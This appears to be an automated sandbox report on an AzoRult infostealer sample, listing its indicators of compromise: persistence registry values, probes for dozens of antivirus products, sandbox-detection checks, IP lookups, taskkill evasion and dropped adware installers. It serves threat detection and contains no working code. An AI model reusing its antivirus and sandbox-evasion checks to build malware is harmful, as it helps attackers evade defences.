azorult | hxxps://keygenninja[.]com/

Processes:

multitimer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\50bph4mn0rb = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\XOHWF7HDC2\\multitimer.exe\" 1 3.1617573975.606a385752eca"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

askinstall20.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

221 ipinfo.io
228 ipinfo.io
721 ipinfo.io
886 ipinfo.io
225 ip-api.com
290 ip-api.com
452 ipinfo.io
454 ipinfo.io
797 ipinfo.io
887 ipinfo.io

flow	ioc
221	ipinfo.io
228	ipinfo.io
721	ipinfo.io
886	ipinfo.io
225	ip-api.com
290	ip-api.com
452	ipinfo.io
454	ipinfo.io
797	ipinfo.io
887	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 49 IoCs

Processes:

Full_Version.exevpn.tmpIBInstaller_97039.tmp

description	ioc	process
File created	C:\Program Files\unins.vbs	Full_Version.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\stdvcl40.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\getithelper260.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-E0CJM.tmp	vpn.tmp
File created	C:\Program Files\unins0000.dat	Full_Version.exe
File opened for modification	C:\Program Files (x86)\Install engine 16\ucrtbase.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6HSD9.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9G4T1.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-O2DAT.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-DP6Q6.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-KON4R.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-GEF9J.tmp	vpn.tmp
File created	C:\Program Files\unins0000.dll	Full_Version.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\networkinspection.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-35MK2.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-134IC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PLFLA.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-73V5P.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PL6V3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2KMVF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\d3dcompiler_47.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\Swap.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-5PENF.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-FHEQM.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-7U2M5.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-I4RJ3.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\PPMd.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-LAKFU.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-1AS5O.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-3FOCF.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-KRITU.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\libGLESv2.dll	IBInstaller_97039.tmp

Drops file in Windows directory 3 IoCs

Processes:

multitimer.exeMicrosoftEdge.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6212	6892	WerFault.exe	AddInProcess32.exe
7564	1348	WerFault.exe	RunWW.exe
4576	1348	WerFault.exe	RunWW.exe
6192	1348	WerFault.exe	RunWW.exe
7416	1348	WerFault.exe	RunWW.exe
6968	1348	WerFault.exe	RunWW.exe
7780	1348	WerFault.exe	RunWW.exe
7236	1348	WerFault.exe	RunWW.exe
6324	1348	WerFault.exe	RunWW.exe
7216	1348	WerFault.exe	RunWW.exe
7904	1348	WerFault.exe	RunWW.exe
8048	1348	WerFault.exe	RunWW.exe
8112	1348	WerFault.exe	RunWW.exe
4616	1348	WerFault.exe	RunWW.exe
9808	4740	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msinfo32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	msinfo32.exe

Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

9748 timeout.exe
8488 timeout.exe
5444 timeout.exe
4000 timeout.exe
6068 timeout.exe
6448 timeout.exe
8576 timeout.exe

pid	process
9748	timeout.exe
8488	timeout.exe
5444	timeout.exe
4000	timeout.exe
6068	timeout.exe
6448	timeout.exe
8576	timeout.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

Processes:

msinfo32.exemultitimer.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease	msinfo32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4784	taskkill.exe
5900	taskkill.exe
5172	taskkill.exe
6864	taskkill.exe
7596	taskkill.exe
9004	taskkill.exe
6352	taskkill.exe
4316	taskkill.exe
4444	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeOpenWith.exeMicrosoftEdgeCP.exeFull_Version.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{351AD221-965A-4AB9-861A-D5E2E697D048}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000039c780a1196d3aa663b7b9d9522427eec9f94c085d250147ae9e23e9b23eef96a03a2384e2b2327f2d06b2123d962b60c4ae196ec9f6fa88e465	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	Full_Version.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 541eb5fdaf29d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6bfc50fdaf29d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
